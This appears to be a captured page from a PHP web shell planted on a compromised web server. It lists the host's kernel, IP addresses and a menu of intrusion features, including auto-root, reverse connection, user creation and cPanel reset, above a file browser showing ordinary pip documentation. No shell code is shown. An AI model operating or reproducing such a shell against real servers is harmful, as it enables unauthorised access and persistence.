Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.238
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python-pip /
html /
reference /
[ HOME SHELL ]
Name
Size
Permission
Action
index.rst
238
B
-rw-r--r--
pip.rst.gz
3.23
KB
-rw-r--r--
pip_check.rst
598
B
-rw-r--r--
pip_config.rst
215
B
-rw-r--r--
pip_download.rst
3.4
KB
-rw-r--r--
pip_freeze.rst
602
B
-rw-r--r--
pip_hash.rst
1.18
KB
-rw-r--r--
pip_install.rst.gz
11.23
KB
-rw-r--r--
pip_list.rst
1.64
KB
-rw-r--r--
pip_search.rst
443
B
-rw-r--r--
pip_show.rst
2.08
KB
-rw-r--r--
pip_uninstall.rst
543
B
-rw-r--r--
pip_wheel.rst
1.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pip_show.rst
.. _`pip show`: pip show -------- .. contents:: Usage ***** .. pip-command-usage:: show Description *********** .. pip-command-description:: show Options ******* .. pip-command-options:: show Examples ******** #. Show information about a package: :: $ pip show sphinx Name: Sphinx Version: 1.4.5 Summary: Python documentation generator Home-page: http://sphinx-doc.org/ Author: Georg Brandl Author-email: georg@python.org License: BSD Location: /my/env/lib/python2.7/site-packages Requires: docutils, snowballstemmer, alabaster, Pygments, imagesize, Jinja2, babel, six #. Show all information about a package :: $ pip show --verbose sphinx Name: Sphinx Version: 1.4.5 Summary: Python documentation generator Home-page: http://sphinx-doc.org/ Author: Georg Brandl Author-email: georg@python.org License: BSD Location: /my/env/lib/python2.7/site-packages Requires: docutils, snowballstemmer, alabaster, Pygments, imagesize, Jinja2, babel, six Metadata-Version: 2.0 Installer: Classifiers: Development Status :: 5 - Production/Stable Environment :: Console Environment :: Web Environment Intended Audience :: Developers Intended Audience :: Education License :: OSI Approved :: BSD License Operating System :: OS Independent Programming Language :: Python Programming Language :: Python :: 2 Programming Language :: Python :: 3 Framework :: Sphinx Framework :: Sphinx :: Extension Framework :: Sphinx :: Theme Topic :: Documentation Topic :: Documentation :: Sphinx Topic :: Text Processing Topic :: Utilities Entry-points: [console_scripts] sphinx-apidoc = sphinx.apidoc:main sphinx-autogen = sphinx.ext.autosummary.generate:main sphinx-build = sphinx:main sphinx-quickstart = sphinx.quickstart:main [distutils.commands] build_sphinx = sphinx.setup_command:BuildDoc
Close